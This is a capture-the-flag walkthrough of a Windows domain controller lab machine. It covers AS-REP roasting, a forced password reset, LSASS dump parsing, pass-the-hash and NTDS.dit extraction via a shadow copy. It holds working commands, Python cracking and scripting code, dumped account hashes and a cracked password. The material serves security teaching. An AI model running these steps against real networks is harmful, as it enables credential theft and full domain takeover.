Hard Windows Active Directory machine with a clean, realistic attack chain. Guest SMB access leaks hundreds of
usernames from a profiles share. AS-REP roasting cracks the support account. BloodHound reveals
ForceChangePassword over audit2020, whose forensic share holds an lsass memory dump.
pypykatz extracts the svc_backup NT hash — a Backup Operator account. SeBackupPrivilege
combined with a VSS shadow copy lets us extract the locked NTDS.dit, giving us the domain Administrator hash.
User Flag
3920bb317axxxxxxxxxxxxxxxxxxxxxx
Root Flag
4375a629c7xxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance
Full port scan reveals a classic DC profile. The domain is BLACKFIELD.local. No starting credentials — we begin unauthenticated.
nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.229.17
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Windows KDC
389/tcp  open  ldap          Active Directory (Domain: BLACKFIELD.local)
445/tcp  open  microsoft-ds  SMB (signing required)
5985/tcp open  wsman         WinRM
| clock-skew: +7h0m3s
clock skew +7h: the KDC rejects requests whose timestamp is more than 5 minutes off its own clock (KRB_AP_ERR_SKEW), so sync before any tool that authenticates with Kerberos or presents a ticket: sudo ntpdate -u 10.129.229.17. On this box NTLM is still enabled, so NTLM-based tooling is unaffected and the skew is rarely a blocker, but keep it in mind.
02 SMB Enumeration — guest access
A null session is rejected, but the guest account with a blank password is enabled. The profiles$ share contains hundreds of empty user profile directories; profile directories are named after the account that owns them, so the listing is a complete list of valid AD usernames.
guest share enum
$ nxc smb $IP -u 'guest' -p '' --shares
profiles$   READ
forensic    (no access)
IPC$        READ
finding: ~300 AD usernames extracted. Notable ones: audit2020, support, svc_backup. The share exists purely for profile storage — guest read access exposes the entire user list.
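Turning that listing into a user list, as an added example (not part of the original write-up): the sample listing below is constructed in the style of smbclient's ls output, with a handful of names instead of the ~300 on the box. Directory entries (attribute D) other than . and .. are the usernames; files such as desktop.ini and the trailing free-space line are dropped.

```python
import re

# Constructed sample of `smbclient -N //10.129.229.17/profiles$ -c ls` output
# (same column layout as the real listing; the names are a subset, not the real ~300).
SAMPLE_LISTING = """\
  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  audit2020                           D        0  Wed Jun  3 12:47:11 2020
  support                             D        0  Wed Jun  3 12:47:11 2020
  svc_backup                          D        0  Wed Jun  3 12:47:11 2020
  desktop.ini                         A      282  Wed Jun  3 12:47:11 2020

                7846143 blocks of size 4096. 3940216 blocks available
"""

# smbclient prints "<name> <attrs> <size> <date>". The attribute/size/weekday/month
# columns anchor the match, so a name containing a single space still parses.
_ROW = re.compile(r"^\s{2}(?P<name>.+?)\s{2,}(?P<attr>[A-Z]+)\s+\d+\s+\w{3}\s+\w{3}")


def usernames_from_listing(listing: str) -> list[str]:
    """Directory names in a profile share are sAMAccountNames; files and '.'/'..' are not."""
    names = set()
    for line in listing.splitlines():
        m = _ROW.match(line)
        if not m or "D" not in m.group("attr") or m.group("name") in (".", ".."):
            continue
        names.add(m.group("name"))
    return sorted(names, key=str.lower)


def write_userlist(listing: str, path: str) -> int:
    """Write one name per line, the format GetNPUsers -usersfile and nxc -u expect."""
    names = usernames_from_listing(listing)
    with open(path, "w") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    print(write_userlist(SAMPLE_LISTING, "users.txt"), "usernames written to users.txt")
```

The same parser works on a full listing piped from smbclient; feed the resulting users.txt to the AS-REP roast in the next section and, with a valid credential later, to a password spray.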
03 AS-REP Roasting — support
AS-REP roasting targets accounts with Kerberos pre-authentication disabled (UF_DONT_REQUIRE_PREAUTH). Normally an AS-REQ must carry a timestamp encrypted with the user's key before the KDC will answer; without that requirement the KDC answers an unauthenticated AS-REQ for the account, and the enc-part of its AS-REP (session key and ticket lifetimes) is encrypted with a key derived only from the account's password. With RC4-HMAC (etype 23) that key is simply the NT hash, so the blob can be brute-forced offline against a wordlist (hashcat mode 18200, John format krb5asrep) with no further contact with the DC.
credential:support:#00^BlackKnight — cracked in ~6 seconds.
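Why the blob cracks offline, as an added example rather than anything from the original write-up: the code below implements the etype 23 primitives (NT hash = MD4 of the UTF-16LE password, RC4-HMAC per RFC 4757 with key usage 8 for the AS-REP enc-part), builds a hashcat-format line from a simulated AS-REP, and then recovers the password by trying candidates. The KDC, the user name, the realm spelling and the EncASRepPart contents are all stand-ins constructed here; the real enc-part is DER, and its contents are irrelevant to the attack because only the key it was encrypted under matters.

```python
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, spelled out because hashlib on OpenSSL 3 hosts usually refuses 'md4'."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, s: ((v << s) | (v >> (32 - s))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2, message words taken column-wise
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """The NT hash doubles as the Kerberos RC4-HMAC long-term key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


ASREP_USAGE = 8  # RFC 4757 key usage number for the AS-REP encrypted part


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = ASREP_USAGE, confounder: bytes = None) -> bytes:
    """What the KDC does to the EncASRepPart: checksum || RC4(K3, confounder || plaintext)."""
    conf = confounder if confounder is not None else os.urandom(8)
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, conf + plaintext)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, conf + plaintext)


def rc4_hmac_decrypt(key: bytes, ciphertext: bytes, usage: int = ASREP_USAGE):
    """Plaintext if the checksum verifies under this key, else None: the whole 'is the password right?' test."""
    checksum, edata = ciphertext[:16], ciphertext[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plain = rc4(_hmac_md5(k1, checksum), edata)
    if not hmac.compare_digest(_hmac_md5(k1, plain), checksum):
        return None
    return plain[8:]  # drop the confounder


def hashcat_line(user: str, realm: str, enc_part: bytes) -> str:
    """Layout impacket's GetNPUsers -format hashcat emits (hashcat mode 18200)."""
    return f"$krb5asrep$23${user}@{realm}:{enc_part[:16].hex()}${enc_part[16:].hex()}"


def crack_asrep(line: str, wordlist):
    """Offline: one MD4, three HMAC-MD5 and one RC4 per candidate; the KDC is never contacted."""
    _, _, _, rest = line.split("$", 3)  # rest = 'user@REALM:checksum$edata'
    checksum_hex, edata_hex = rest.split(":", 1)[1].split("$", 1)
    ciphertext = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), ciphertext) is not None:
            return candidate
    return None


def simulate_asrep(user: str, password: str, realm: str = "BLACKFIELD.LOCAL") -> str:
    """Constructed stand-in for the DC: the enc-part here is a placeholder, not real DER."""
    fake_enc_part = b"\x79\x81\x00" + b"constructed EncASRepPart with session key"
    return hashcat_line(user, realm, rc4_hmac_encrypt(nt_hash(password), fake_enc_part))


if __name__ == "__main__":
    roast = simulate_asrep("support", "#00^BlackKnight")
    print(roast)
    print("cracked:", crack_asrep(roast, ["password", "Winter2020", "#00^BlackKnight"]))
```

Against a real DC the line comes from impacket-GetNPUsers with a users file and -format hashcat, and hashcat -m 18200 does the loop above at GPU speed; the point of the code is that nothing in that loop needs the KDC, which is why a 6-second crack leaves no further trace on the DC beyond the single AS-REQ.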
04 BloodHound — ACL Attack Path
With valid credentials, collect all BloodHound data to map AD attack paths.
bloodhound-python collection
$ bloodhound-python -u support -p '#00^BlackKnight' -d BLACKFIELD.local -ns $IP -c All --zip
attack path discovered: support →(ForceChangePassword)→ audit2020. ForceChangePassword is the User-Force-Change-Password extended right on the target user object; whoever holds it can set a new password without knowing the current one, which is a full account takeover with no prior knowledge.
05 ForceChangePassword → audit2020
Use rpcclient's setuserinfo2 command, authenticated as support over SMB/IPC$, to set a new password for audit2020 directly. Info level 23 (USER_INFO_23 / SAMPR_USER_INFO_23) carries a new NT password and goes through SamrSetInformationUser2, an administrative set operation rather than a change-password call, so the current password is never required; the User-Force-Change-Password right on the target object is all that is checked. The new password used here is Password123!, as seen in the connection string below.
06 Forensic Share — LSASS Dump
With audit2020's new password the forensic share becomes readable. It contains process memory dumps in memory_analysis/; the critical one is lsass.zip, a minidump of LSASS (Local Security Authority Subsystem Service), the process that performs Windows authentication and keeps NT hashes, Kerberos keys and sometimes plaintext passwords in memory for every logged-on user.
Standard smbclient get times out on large files. Use impacket-smbclient instead.
download lsass.zip via impacket-smbclient
$ impacket-smbclient 'BLACKFIELD.local/audit2020:Password123!@'$IP
# use forensic
# cd memory_analysis
# get lsass.zip
Unzip the archive and parse the minidump offline with pypykatz (its lsa minidump mode), which lists the credential material of every logon session the dump held.
credential: svc_backup NT hash 9658d1d1dcd9250115e2205d9f48400d. Storing process memory dumps on a network share is catastrophic: LSASS holds live credentials for every session that was authenticated when the dump was taken, and a minidump stays crackable and reusable for as long as those passwords remain unchanged.
07 Foothold — svc_backup via Pass-the-Hash
Pass the NT hash directly to evil-winrm — no password cracking needed.
evil-winrm PTH → user flag
$ nxc winrm $IP -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
[+] BLACKFIELD.local\svc_backup (Pwn3d!)
$ evil-winrm -i $IP -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
3920bb317axxxxxxxxxxxxxxxxxxxxxx
confirm SeBackupPrivilege
*Evil-WinRM* PS C:\> whoami /priv
SeBackupPrivilege    Back up files and directories    Enabled
key privilege: svc_backup is a member of Backup Operators. SeBackupPrivilege makes the kernel skip the DACL check on file opens made with backup semantics, so the account can read any file on the system regardless of its ACL. Two caveats: it does not bypass exclusive locks (hence the shadow copy below), and it only applies to tools that request backup semantics (hence robocopy /b rather than copy).
08 Privilege Escalation — SeBackupPrivilege + VSS
Why NTDS.dit, not SAM? SAM stores hashes for local accounts only. On a Domain Controller the domain Administrator hash lives in the Active Directory database, C:\Windows\NTDS\ntds.dit, which holds the NT hash of every domain account. The AD DS service keeps ntds.dit open with an exclusive lock while running; even with SeBackupPrivilege a direct copy fails with a sharing violation.
The solution: Volume Shadow Copy (VSS). VSS creates a point-in-time snapshot of a volume including locked files. We create a shadow copy of C:\, expose it as Z:\, then copy NTDS.dit from the snapshot where it isn't locked.
Step 1 — Create the diskshadow script on Kali. The script must use Windows line endings (CRLF): diskshadow /s reads it line by line and with LF-only endings it silently skips commands or errors out, so the shadow copy is never created.
Convert with unix2dos (or write the file with CRLF to begin with) and check it before uploading, for example with file vss.txt, which should report "with CRLF line terminators".
why robocopy /b? The /b flag enables backup mode, which activates SeBackupPrivilege to bypass file ACL restrictions. Normal file copy commands don't invoke the privilege even when it's present.
Step 4 — Save the SYSTEM hive (reg save HKLM\SYSTEM, which also works under SeBackupPrivilege). The NT hashes inside NTDS.dit are encrypted with the Password Encryption Key (PEK), and the PEK is itself encrypted with the boot key derived from the SYSTEM registry hive; without SYSTEM, secretsdump cannot unwrap the PEK and therefore cannot decrypt a single hash.
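The whole procedure in one place, as an added example that is not code from the original write-up: the Kali side generates the diskshadow script with CRLF endings and refuses to write it otherwise (the check is the programmatic equivalent of running unix2dos and file), and the target-side command sequence is recorded alongside it. The working directory C:\Temp, the alias name cdrive and the drive letter Z: are assumptions; the diskshadow, robocopy, reg save and secretsdump invocations are the standard ones for this technique.

```python
# Lines of the diskshadow script; diskshadow /s executes them top to bottom.
DISKSHADOW_LINES = [
    "set context persistent nowriters",  # snapshot survives diskshadow exiting; skip VSS writers
    "add volume c: alias cdrive",        # the volume holding C:\Windows\NTDS\ntds.dit
    "create",                            # take the snapshot
    "expose %cdrive% z:",                # mount the snapshot as Z:
]


def to_crlf(data: bytes) -> bytes:
    """Normalise any mix of LF / CRLF to CRLF, which is what unix2dos does to the file."""
    return data.replace(b"\r\n", b"\n").replace(b"\n", b"\r\n")


def diskshadow_script(lines=DISKSHADOW_LINES) -> bytes:
    return to_crlf("\n".join(lines).encode("ascii") + b"\n")


def crlf_only(data: bytes) -> bool:
    """Pre-upload check: every line terminated by CRLF, no stray bare LF or CR anywhere."""
    stripped = data.replace(b"\r\n", b"")
    return data.endswith(b"\r\n") and b"\n" not in stripped and b"\r" not in stripped


def write_script(path: str, lines=DISKSHADOW_LINES) -> bytes:
    """Write vss.txt in binary mode so nothing on the way rewrites the line endings."""
    data = diskshadow_script(lines)
    if not crlf_only(data):
        raise ValueError("diskshadow script must be CRLF-terminated")
    with open(path, "wb") as fh:
        fh.write(data)
    return data


# Target side, typed into the evil-winrm session after `upload vss.txt C:\Temp\vss.txt`
# (C:\Temp is an assumed working directory that svc_backup can write to).
TARGET_STEPS = [
    r"diskshadow /s C:\Temp\vss.txt",                 # step 2: snapshot C: and expose it as Z:
    r"robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit",  # step 3: /b = backup mode, uses SeBackupPrivilege
    r"reg save HKLM\SYSTEM C:\Temp\system.hive",      # step 4: boot key that unwraps the PEK
    r"download C:\Temp\ntds.dit ntds.dit",
    r"download C:\Temp\system.hive system.hive",
]

# Back on Kali: decrypt the hashes offline with both files.
KALI_STEP = "impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL"


if __name__ == "__main__":
    write_script("vss.txt")
    print("vss.txt written with CRLF endings; now on the target:")
    for step in TARGET_STEPS:
        print("  ", step)
    print("then locally:", KALI_STEP)
```

If diskshadow runs without error but Z: never appears, re-check the script with crlf_only (or file vss.txt) before suspecting VSS itself; a bare-LF file is by far the most common cause.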
$ impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
evil-winrm PTH as Administrator → root flag
$ evil-winrm -i $IP -u Administrator -H '184fb5e5178480be64824d4cd53b99ee'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
4375a629c7xxxxxxxxxxxxxxxxxxxxxx
key takeaways:
· Guest access to a profiles share leaks the entire user list — perfect AS-REP/spray target
· ForceChangePassword gives full account takeover with no knowledge of the current password
· LSASS memory dumps on network shares expose live NT hashes for all authenticated sessions
· SAM holds local accounts only — on a DC you need NTDS.dit for domain hashes
· SeBackupPrivilege on a Domain Controller is effectively Domain Admin: Backup Operators must be treated as a Tier 0 group
· A VSS shadow copy sidesteps the exclusive lock on ntds.dit; it is the standard way to copy the file off a live DC
· Both NTDS.dit and the SYSTEM hive are required: hashes are encrypted with the boot key stored in SYSTEM